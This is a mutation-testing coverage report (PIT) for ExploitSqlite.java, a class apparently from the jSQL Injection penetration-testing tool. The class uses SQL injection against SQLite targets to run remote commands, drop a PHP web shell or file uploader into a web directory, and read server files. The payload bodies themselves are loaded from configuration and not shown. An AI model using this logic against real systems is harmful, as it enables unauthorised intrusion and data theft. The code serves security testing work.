ExploitSqlite.java

package com.jsql.model.accessible.vendor;

import com.jsql.model.InjectionModel;
import com.jsql.model.accessible.DataAccess;
import com.jsql.model.accessible.ResourceAccess;
import com.jsql.model.accessible.vendor.sqlite.ModelYamlSqlite;
import com.jsql.model.bean.database.MockElement;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.AbstractSlidingException;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.exception.JSqlRuntimeException;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.util.LogLevelUtil;
import com.jsql.util.StringUtil;
import org.apache.commons.lang3.RandomStringUtils;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.yaml.snakeyaml.Yaml;

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.http.HttpResponse;
import java.util.UUID;
import java.util.function.BinaryOperator;

public class ExploitSqlite {

    private static final Logger LOGGER = LogManager.getRootLogger();
    private final InjectionModel injectionModel;
    private final ModelYamlSqlite modelYaml;

    public ExploitSqlite(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        var yaml = new Yaml();
        this.modelYaml = yaml.loadAs(
            injectionModel.getMediatorVendor().getSqlite().instance().getModelYaml().getResource().getExploit(),
            ModelYamlSqlite.class
        );
    }

    public void createUdf() {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE UDF requirements: extension exec loaded");
        var result = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
            this.modelYaml.getExtension().getExec(),
            ResourceAccess.WEB_CONFIRM_CMD +"%20"
        ), ResourceAccess.TBL_READ);
        if (result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
            LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE UDF successful: command execution found");
            var request = new Request();
            request.setMessage(Interaction.ADD_TAB_EXPLOIT_UDF_SQLITE);
            request.setParameters(null, null);
            this.injectionModel.sendToViews(request);
        }
    }

    public String runRce(String command, UUID uuidShell) {
        String result;
        try {
            result = this.injectionModel.getResourceAccess().getResult(String.format(
                this.modelYaml.getExtension().getExec(),
                command.replace(StringUtils.SPACE, "%20")
            ), ResourceAccess.RUN_FUNC);
        } catch (JSqlException e) {
            result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
        }
        var request = new Request();
        request.setMessage(Interaction.GET_TERMINAL_RESULT);
        request.setParameters(uuidShell, result.trim() +"\n");  // missing newline on some extensions
        this.injectionModel.sendToViews(request);
        return result;
    }

    public String createWeb(String pathExploit, String urlExploit) {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine");

        String bodyExploit = StringUtil.base64Decode(
                this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty("exploit.web")
            )
            .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
            .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
        var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8);
        var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8);
        var nameExploit = nameDbRandom + nameTableRandom +".php";
        this.injectionModel.injectWithoutIndex(String.format(
            this.modelYaml.getWriteFile(),
            pathExploit + nameExploit, nameDbRandom,
            nameDbRandom, nameTableRandom,
            nameDbRandom, nameTableRandom, bodyExploit
        ), ResourceAccess.TBL_DUMP);

        BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
            String result = this.injectionModel.getResourceAccess().callCommand(
                urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
            );
            if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
                LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
                return StringUtils.EMPTY;
            }

            var request = new Request();
            request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
            request.setParameters(urlSuccess);
            this.injectionModel.sendToViews(request);
            return urlSuccess;
        };

        return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
        String bodyExploit = StringUtil.base64Decode(
                this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
            )
            .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
            .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
        var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8);
        var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8);
        var nameExploit = nameDbRandom + nameTableRandom +".php";
        this.injectionModel.injectWithoutIndex(String.format(
            this.modelYaml.getWriteFile(),
            pathExploit + nameExploit, nameDbRandom,
            nameDbRandom, nameTableRandom,
            nameDbRandom, nameTableRandom, bodyExploit
        ), ResourceAccess.TBL_DUMP);

        BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
            try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
                HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
                if (result.body().contains(DataAccess.LEAD +"y")) {
                    LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
                } else {
                    LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
                }
            } catch (InterruptedException e) {
                LOGGER.log(LogLevelUtil.IGNORE, e, e);
                Thread.currentThread().interrupt();
            } catch (IOException | JSqlException e) {
                throw new JSqlRuntimeException(e);
            }
            return urlSuccess;
        };

        this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    public String getRead(String pathFile) throws AbstractSlidingException {
        LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Read file requirement: extension fileio loaded");
        return new SuspendableGetRows(this.injectionModel).run(
                String.format(
                this.injectionModel.getResourceAccess().getExploitSqlite().getModelYaml().getExtension().getFileioRead(),
                pathFile
            ),
            new String[]{ StringUtils.EMPTY },
            false,
            1,
            MockElement.MOCK,
            ResourceAccess.FILE_READ
        );
    }

    public ModelYamlSqlite getModelYaml() {
        return this.modelYaml;
    }
}





















Active mutators

CONDITIONALS_BOUNDARY
EMPTY_RETURNS
FALSE_RETURNS
INCREMENTS
INVERT_NEGS
MATH
NEGATE_CONDITIONALS
NULL_RETURNS
PRIMITIVE_RETURNS
TRUE_RETURNS
VOID_METHOD_CALLS

Tests examined

Report generated by PIT 1.19.1

1		package com.jsql.model.accessible.vendor;
2
3		import com.jsql.model.InjectionModel;
4		import com.jsql.model.accessible.DataAccess;
5		import com.jsql.model.accessible.ResourceAccess;
6		import com.jsql.model.accessible.vendor.sqlite.ModelYamlSqlite;
7		import com.jsql.model.bean.database.MockElement;
8		import com.jsql.model.bean.util.Interaction;
9		import com.jsql.model.bean.util.Request;
10		import com.jsql.model.exception.AbstractSlidingException;
11		import com.jsql.model.exception.JSqlException;
12		import com.jsql.model.exception.JSqlRuntimeException;
13		import com.jsql.model.suspendable.SuspendableGetRows;
14		import com.jsql.util.LogLevelUtil;
15		import com.jsql.util.StringUtil;
16		import org.apache.commons.lang3.RandomStringUtils;
17		import org.apache.commons.lang3.StringUtils;
18		import org.apache.logging.log4j.LogManager;
19		import org.apache.logging.log4j.Logger;
20		import org.yaml.snakeyaml.Yaml;
21
22		import java.io.File;
23		import java.io.FileInputStream;
24		import java.io.IOException;
25		import java.io.InputStream;
26		import java.net.http.HttpResponse;
27		import java.util.UUID;
28		import java.util.function.BinaryOperator;
29
30		public class ExploitSqlite {
31
32		private static final Logger LOGGER = LogManager.getRootLogger();
33		private final InjectionModel injectionModel;
34		private final ModelYamlSqlite modelYaml;
35
36		public ExploitSqlite(InjectionModel injectionModel) {
37		this.injectionModel = injectionModel;
38		var yaml = new Yaml();
39		this.modelYaml = yaml.loadAs(
40		injectionModel.getMediatorVendor().getSqlite().instance().getModelYaml().getResource().getExploit(),
41		ModelYamlSqlite.class
42		);
43		}
44
45		public void createUdf() {
46		LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE UDF requirements: extension exec loaded");
47		var result = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
48		this.modelYaml.getExtension().getExec(),
49		ResourceAccess.WEB_CONFIRM_CMD +"%20"
50		), ResourceAccess.TBL_READ);
51	1 1. createUdf : negated conditional → NO_COVERAGE	if (result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
52		LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE UDF successful: command execution found");
53		var request = new Request();
54	1 1. createUdf : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE	request.setMessage(Interaction.ADD_TAB_EXPLOIT_UDF_SQLITE);
55	1 1. createUdf : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE	request.setParameters(null, null);
56	1 1. createUdf : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE	this.injectionModel.sendToViews(request);
57		}
58		}
59
60		public String runRce(String command, UUID uuidShell) {
61		String result;
62		try {
63		result = this.injectionModel.getResourceAccess().getResult(String.format(
64		this.modelYaml.getExtension().getExec(),
65		command.replace(StringUtils.SPACE, "%20")
66		), ResourceAccess.RUN_FUNC);
67		} catch (JSqlException e) {
68		result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
69		}
70		var request = new Request();
71	1 1. runRce : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE	request.setMessage(Interaction.GET_TERMINAL_RESULT);
72	1 1. runRce : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE	request.setParameters(uuidShell, result.trim() +"\n"); // missing newline on some extensions
73	1 1. runRce : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE	this.injectionModel.sendToViews(request);
74	1 1. runRce : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::runRce → NO_COVERAGE	return result;
75		}
76
77		public String createWeb(String pathExploit, String urlExploit) {
78		LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine");
79
80		String bodyExploit = StringUtil.base64Decode(
81		this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty("exploit.web")
82		)
83		.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
84		.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
85		var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8);
86		var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8);
87		var nameExploit = nameDbRandom + nameTableRandom +".php";
88		this.injectionModel.injectWithoutIndex(String.format(
89		this.modelYaml.getWriteFile(),
90		pathExploit + nameExploit, nameDbRandom,
91		nameDbRandom, nameTableRandom,
92		nameDbRandom, nameTableRandom, bodyExploit
93		), ResourceAccess.TBL_DUMP);
94
95		BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
96		String result = this.injectionModel.getResourceAccess().callCommand(
97		urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
98		);
99	1 1. lambda$createWeb$0 : negated conditional → NO_COVERAGE	if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
100		LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
101		return StringUtils.EMPTY;
102		}
103
104		var request = new Request();
105	1 1. lambda$createWeb$0 : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE	request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
106	1 1. lambda$createWeb$0 : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE	request.setParameters(urlSuccess);
107	1 1. lambda$createWeb$0 : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE	this.injectionModel.sendToViews(request);
108	1 1. lambda$createWeb$0 : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::lambda$createWeb$0 → NO_COVERAGE	return urlSuccess;
109		};
110
111	1 1. createWeb : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::createWeb → NO_COVERAGE	return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
112		}
113
114		public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
115		String bodyExploit = StringUtil.base64Decode(
116		this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
117		)
118		.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
119		.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
120		var nameDbRandom = RandomStringUtils.secure().nextAlphabetic(8);
121		var nameTableRandom = RandomStringUtils.secure().nextAlphabetic(8);
122		var nameExploit = nameDbRandom + nameTableRandom +".php";
123		this.injectionModel.injectWithoutIndex(String.format(
124		this.modelYaml.getWriteFile(),
125		pathExploit + nameExploit, nameDbRandom,
126		nameDbRandom, nameTableRandom,
127		nameDbRandom, nameTableRandom, bodyExploit
128		), ResourceAccess.TBL_DUMP);
129
130		BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
131		try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
132		HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
133	1 1. lambda$createUpload$1 : negated conditional → NO_COVERAGE	if (result.body().contains(DataAccess.LEAD +"y")) {
134		LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
135		} else {
136		LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
137		}
138		} catch (InterruptedException e) {
139		LOGGER.log(LogLevelUtil.IGNORE, e, e);
140	1 1. lambda$createUpload$1 : removed call to java/lang/Thread::interrupt → NO_COVERAGE	Thread.currentThread().interrupt();
141		} catch (IOException \| JSqlException e) {
142		throw new JSqlRuntimeException(e);
143		}
144	1 1. lambda$createUpload$1 : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::lambda$createUpload$1 → NO_COVERAGE	return urlSuccess;
145		};
146
147		this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
148		}
149
150		public String getRead(String pathFile) throws AbstractSlidingException {
151		LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Read file requirement: extension fileio loaded");
152	1 1. getRead : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::getRead → NO_COVERAGE	return new SuspendableGetRows(this.injectionModel).run(
153		String.format(
154		this.injectionModel.getResourceAccess().getExploitSqlite().getModelYaml().getExtension().getFileioRead(),
155		pathFile
156		),
157		new String[]{ StringUtils.EMPTY },
158		false,
159		1,
160		MockElement.MOCK,
161		ResourceAccess.FILE_READ
162		);
163		}
164
165		public ModelYamlSqlite getModelYaml() {
166	1 1. getModelYaml : replaced return value with null for com/jsql/model/accessible/vendor/ExploitSqlite::getModelYaml → NO_COVERAGE	return this.modelYaml;
167		}
168		}
		Mutations
51		1.1 Location : createUdf Killed by : none negated conditional → NO_COVERAGE
54		1.1 Location : createUdf Killed by : none removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE
55		1.1 Location : createUdf Killed by : none removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE
56		1.1 Location : createUdf Killed by : none removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE
71		1.1 Location : runRce Killed by : none removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE
72		1.1 Location : runRce Killed by : none removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE
73		1.1 Location : runRce Killed by : none removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE
74		1.1 Location : runRce Killed by : none replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::runRce → NO_COVERAGE
99		1.1 Location : lambda$createWeb$0 Killed by : none negated conditional → NO_COVERAGE
105		1.1 Location : lambda$createWeb$0 Killed by : none removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE
106		1.1 Location : lambda$createWeb$0 Killed by : none removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE
107		1.1 Location : lambda$createWeb$0 Killed by : none removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE
108		1.1 Location : lambda$createWeb$0 Killed by : none replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::lambda$createWeb$0 → NO_COVERAGE
111		1.1 Location : createWeb Killed by : none replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::createWeb → NO_COVERAGE
133		1.1 Location : lambda$createUpload$1 Killed by : none negated conditional → NO_COVERAGE
140		1.1 Location : lambda$createUpload$1 Killed by : none removed call to java/lang/Thread::interrupt → NO_COVERAGE
144		1.1 Location : lambda$createUpload$1 Killed by : none replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::lambda$createUpload$1 → NO_COVERAGE
152		1.1 Location : getRead Killed by : none replaced return value with "" for com/jsql/model/accessible/vendor/ExploitSqlite::getRead → NO_COVERAGE
166		1.1 Location : getModelYaml Killed by : none replaced return value with null for com/jsql/model/accessible/vendor/ExploitSqlite::getModelYaml → NO_COVERAGE

ExploitSqlite.java

Mutations

Active mutators

Tests examined